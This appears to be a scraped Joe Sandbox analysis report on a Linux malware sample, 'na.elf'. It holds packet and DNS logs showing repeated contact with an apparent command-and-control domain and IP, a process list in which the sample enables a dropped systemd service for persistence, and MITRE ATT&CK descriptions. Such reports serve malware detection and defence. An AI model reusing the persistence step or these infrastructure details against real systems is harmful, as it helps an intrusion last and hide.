Oct 7, 2024 16:31:39.849700928 CEST	23561	58474	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:44.854830027 CEST	58476	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:44.859985113 CEST	23561	58476	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:44.860038996 CEST	58476	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:44.860656023 CEST	58476	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:44.865478039 CEST	23561	58476	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:46.499381065 CEST	23561	58476	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:46.499594927 CEST	58476	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:46.515489101 CEST	23561	58476	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:47.512934923 CEST	58478	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:47.517978907 CEST	23561	58478	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:47.518062115 CEST	58478	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:47.518776894 CEST	58478	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:47.523643017 CEST	23561	58478	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:49.473634958 CEST	23561	58478	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:49.473812103 CEST	58478	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:49.473917961 CEST	23561	58478	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:49.473970890 CEST	58478	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:49.478671074 CEST	23561	58478	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:59.484180927 CEST	58480	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:59.489130974 CEST	23561	58480	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:59.489197969 CEST	58480	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:59.490488052 CEST	58480	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:59.495296955 CEST	23561	58480	91.200.103.117	192.168.2.14
Oct 7, 2024 16:32:01.248380899 CEST	23561	58480	91.200.103.117	192.168.2.14
Oct 7, 2024 16:32:01.248542070 CEST	58480	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:32:01.253446102 CEST	23561	58480	91.200.103.117	192.168.2.14
Oct 7, 2024 16:32:05.260102034 CEST	58482	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:32:05.265301943 CEST	23561	58482	91.200.103.117	192.168.2.14
Oct 7, 2024 16:32:05.265368938 CEST	58482	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:32:05.266674995 CEST	58482	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:32:05.271995068 CEST	23561	58482	91.200.103.117	192.168.2.14
Oct 7, 2024 16:32:06.902586937 CEST	23561	58482	91.200.103.117	192.168.2.14
Oct 7, 2024 16:32:06.902766943 CEST	58482	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:32:06.907923937 CEST	23561	58482	91.200.103.117	192.168.2.14
Oct 7, 2024 16:32:17.524889946 CEST	58484	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:32:17.529777050 CEST	23561	58484	91.200.103.117	192.168.2.14
Oct 7, 2024 16:32:17.529856920 CEST	58484	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:32:17.530925989 CEST	58484	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:32:17.535742998 CEST	23561	58484	91.200.103.117	192.168.2.14
Oct 7, 2024 16:32:19.141798973 CEST	23561	58484	91.200.103.117	192.168.2.14
Oct 7, 2024 16:32:19.142085075 CEST	58484	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:32:19.146946907 CEST	23561	58484	91.200.103.117	192.168.2.14

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 16:28:53.012841940 CEST	36932	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:28:53.020127058 CEST	53	36932	8.8.8.8	192.168.2.14
Oct 7, 2024 16:28:58.689661026 CEST	57351	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:28:58.697555065 CEST	53	57351	8.8.8.8	192.168.2.14
Oct 7, 2024 16:29:03.345670938 CEST	45582	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:29:03.660681009 CEST	53	45582	8.8.8.8	192.168.2.14
Oct 7, 2024 16:29:09.365724087 CEST	46293	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:29:09.374880075 CEST	53	46293	8.8.8.8	192.168.2.14
Oct 7, 2024 16:29:18.083436012 CEST	58556	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:29:18.392437935 CEST	53	58556	8.8.8.8	192.168.2.14
Oct 7, 2024 16:29:27.031972885 CEST	45389	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:29:27.041310072 CEST	53	45389	8.8.8.8	192.168.2.14
Oct 7, 2024 16:29:32.672904968 CEST	50587	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:29:32.699841976 CEST	53	50587	8.8.8.8	192.168.2.14
Oct 7, 2024 16:29:42.321409941 CEST	42358	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:29:42.328583956 CEST	53	42358	8.8.8.8	192.168.2.14
Oct 7, 2024 16:29:49.957261086 CEST	39920	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:29:49.964222908 CEST	53	39920	8.8.8.8	192.168.2.14
Oct 7, 2024 16:30:00.639090061 CEST	54454	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:30:00.646137953 CEST	53	54454	8.8.8.8	192.168.2.14
Oct 7, 2024 16:30:11.463881016 CEST	41058	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:30:11.476097107 CEST	53	41058	8.8.8.8	192.168.2.14
Oct 7, 2024 16:30:19.128659964 CEST	59215	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:30:19.135488033 CEST	53	59215	8.8.8.8	192.168.2.14
Oct 7, 2024 16:30:25.758140087 CEST	57593	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:30:25.766241074 CEST	53	57593	8.8.8.8	192.168.2.14
Oct 7, 2024 16:30:32.408091068 CEST	39534	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:30:32.415441990 CEST	53	39534	8.8.8.8	192.168.2.14
Oct 7, 2024 16:30:43.079498053 CEST	59575	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:30:43.089122057 CEST	53	59575	8.8.8.8	192.168.2.14
Oct 7, 2024 16:30:53.718226910 CEST	38215	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:30:53.725639105 CEST	53	38215	8.8.8.8	192.168.2.14
Oct 7, 2024 16:30:58.388519049 CEST	43728	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:30:58.396529913 CEST	53	43728	8.8.8.8	192.168.2.14
Oct 7, 2024 16:31:04.030870914 CEST	44451	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:31:04.038640022 CEST	53	44451	8.8.8.8	192.168.2.14
Oct 7, 2024 16:31:07.685758114 CEST	36275	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:31:07.692267895 CEST	53	36275	8.8.8.8	192.168.2.14
Oct 7, 2024 16:31:16.361872911 CEST	47586	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:31:16.369734049 CEST	53	47586	8.8.8.8	192.168.2.14
Oct 7, 2024 16:31:21.685781956 CEST	41402	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:31:21.693394899 CEST	53	41402	8.8.8.8	192.168.2.14
Oct 7, 2024 16:31:29.316126108 CEST	45155	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:31:29.323535919 CEST	53	45155	8.8.8.8	192.168.2.14
Oct 7, 2024 16:31:35.500525951 CEST	33767	53	192.168.2.14	1.1.1.1
Oct 7, 2024 16:31:35.500569105 CEST	44020	53	192.168.2.14	1.1.1.1
Oct 7, 2024 16:31:35.507555962 CEST	53	44020	1.1.1.1	192.168.2.14
Oct 7, 2024 16:31:35.508616924 CEST	53	33767	1.1.1.1	192.168.2.14
Oct 7, 2024 16:31:38.054825068 CEST	56126	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:31:38.061584949 CEST	53	56126	8.8.8.8	192.168.2.14
Oct 7, 2024 16:31:44.846800089 CEST	51743	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:31:44.854408026 CEST	53	51743	8.8.8.8	192.168.2.14
Oct 7, 2024 16:31:47.501451969 CEST	52855	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:31:47.512249947 CEST	53	52855	8.8.8.8	192.168.2.14
Oct 7, 2024 16:31:59.476157904 CEST	52463	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:31:59.483472109 CEST	53	52463	8.8.8.8	192.168.2.14
Oct 7, 2024 16:32:05.251709938 CEST	53984	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:32:05.259263992 CEST	53	53984	8.8.8.8	192.168.2.14
Oct 7, 2024 16:32:16.907840967 CEST	43418	53	192.168.2.14	8.8.8.8
Oct 7, 2024 16:32:17.523463011 CEST	53	43418	8.8.8.8	192.168.2.14

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 16:28:53.012841940 CEST	192.168.2.14	8.8.8.8	0x9db9	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:58.689661026 CEST	192.168.2.14	8.8.8.8	0xa4e8	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:03.345670938 CEST	192.168.2.14	8.8.8.8	0xc3c1	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:09.365724087 CEST	192.168.2.14	8.8.8.8	0xa7c5	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:18.083436012 CEST	192.168.2.14	8.8.8.8	0xd10c	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:27.031972885 CEST	192.168.2.14	8.8.8.8	0x51ec	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:32.672904968 CEST	192.168.2.14	8.8.8.8	0x9cfe	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:42.321409941 CEST	192.168.2.14	8.8.8.8	0x49db	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:49.957261086 CEST	192.168.2.14	8.8.8.8	0x6bfb	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:00.639090061 CEST	192.168.2.14	8.8.8.8	0x20ed	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:11.463881016 CEST	192.168.2.14	8.8.8.8	0x2789	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:19.128659964 CEST	192.168.2.14	8.8.8.8	0x6cd4	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:25.758140087 CEST	192.168.2.14	8.8.8.8	0x156a	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:32.408091068 CEST	192.168.2.14	8.8.8.8	0x8379	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:43.079498053 CEST	192.168.2.14	8.8.8.8	0xe805	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:53.718226910 CEST	192.168.2.14	8.8.8.8	0xebc3	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:58.388519049 CEST	192.168.2.14	8.8.8.8	0xc89d	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:04.030870914 CEST	192.168.2.14	8.8.8.8	0x4f83	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:07.685758114 CEST	192.168.2.14	8.8.8.8	0xfa6c	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:16.361872911 CEST	192.168.2.14	8.8.8.8	0x8c08	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:21.685781956 CEST	192.168.2.14	8.8.8.8	0x1278	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:29.316126108 CEST	192.168.2.14	8.8.8.8	0x4498	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:35.500525951 CEST	192.168.2.14	1.1.1.1	0x6a91	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:35.500569105 CEST	192.168.2.14	1.1.1.1	0x6a43	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Oct 7, 2024 16:31:38.054825068 CEST	192.168.2.14	8.8.8.8	0xeb31	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:44.846800089 CEST	192.168.2.14	8.8.8.8	0xe096	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:47.501451969 CEST	192.168.2.14	8.8.8.8	0xc110	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:59.476157904 CEST	192.168.2.14	8.8.8.8	0x39bb	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:05.251709938 CEST	192.168.2.14	8.8.8.8	0x1bdc	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:16.907840967 CEST	192.168.2.14	8.8.8.8	0xcfac	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 16:28:53.020127058 CEST	8.8.8.8	192.168.2.14	0x9db9	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:58.697555065 CEST	8.8.8.8	192.168.2.14	0xa4e8	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:03.660681009 CEST	8.8.8.8	192.168.2.14	0xc3c1	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:09.374880075 CEST	8.8.8.8	192.168.2.14	0xa7c5	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:18.392437935 CEST	8.8.8.8	192.168.2.14	0xd10c	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:27.041310072 CEST	8.8.8.8	192.168.2.14	0x51ec	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:32.699841976 CEST	8.8.8.8	192.168.2.14	0x9cfe	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:42.328583956 CEST	8.8.8.8	192.168.2.14	0x49db	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:49.964222908 CEST	8.8.8.8	192.168.2.14	0x6bfb	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:00.646137953 CEST	8.8.8.8	192.168.2.14	0x20ed	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:11.476097107 CEST	8.8.8.8	192.168.2.14	0x2789	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:19.135488033 CEST	8.8.8.8	192.168.2.14	0x6cd4	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:25.766241074 CEST	8.8.8.8	192.168.2.14	0x156a	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:32.415441990 CEST	8.8.8.8	192.168.2.14	0x8379	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:43.089122057 CEST	8.8.8.8	192.168.2.14	0xe805	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:53.725639105 CEST	8.8.8.8	192.168.2.14	0xebc3	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:58.396529913 CEST	8.8.8.8	192.168.2.14	0xc89d	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:04.038640022 CEST	8.8.8.8	192.168.2.14	0x4f83	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:07.692267895 CEST	8.8.8.8	192.168.2.14	0xfa6c	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:16.369734049 CEST	8.8.8.8	192.168.2.14	0x8c08	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:21.693394899 CEST	8.8.8.8	192.168.2.14	0x1278	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:29.323535919 CEST	8.8.8.8	192.168.2.14	0x4498	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:35.508616924 CEST	1.1.1.1	192.168.2.14	0x6a91	No error (0)	daisy.ubuntu.com	162.213.35.25	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:35.508616924 CEST	1.1.1.1	192.168.2.14	0x6a91	No error (0)	daisy.ubuntu.com	162.213.35.24	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:38.061584949 CEST	8.8.8.8	192.168.2.14	0xeb31	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:44.854408026 CEST	8.8.8.8	192.168.2.14	0xe096	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:47.512249947 CEST	8.8.8.8	192.168.2.14	0xc110	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:59.483472109 CEST	8.8.8.8	192.168.2.14	0x39bb	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:05.259263992 CEST	8.8.8.8	192.168.2.14	0x1bdc	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:17.523463011 CEST	8.8.8.8	192.168.2.14	0xcfac	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: na.elf PID: 5490, Parent PID: 5414

General

Start time (UTC):	14:28:51
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	/tmp/na.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	14:28:51
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	14:28:51
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	14:28:51
Start date (UTC):	07/10/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	14:28:51
Start date (UTC):	07/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	14:28:51
Start date (UTC):	07/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable sbolo.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	14:28:52
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	14:28:51
Start date (UTC):	07/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	14:28:51
Start date (UTC):	07/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report na.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/systemd/system/sbolo.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.EZS4Br (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: na.elf PID: 5490, Parent PID: 5414

General

Chronological Activities

Analysis Process: na.elf PID: 5492, Parent PID: 5490

General

Chronological Activities

Analysis Process: na.elf PID: 5494, Parent PID: 5490

General

Chronological Activities

Analysis Process: sh PID: 5494, Parent PID: 5490

Linux Analysis Report
na.elf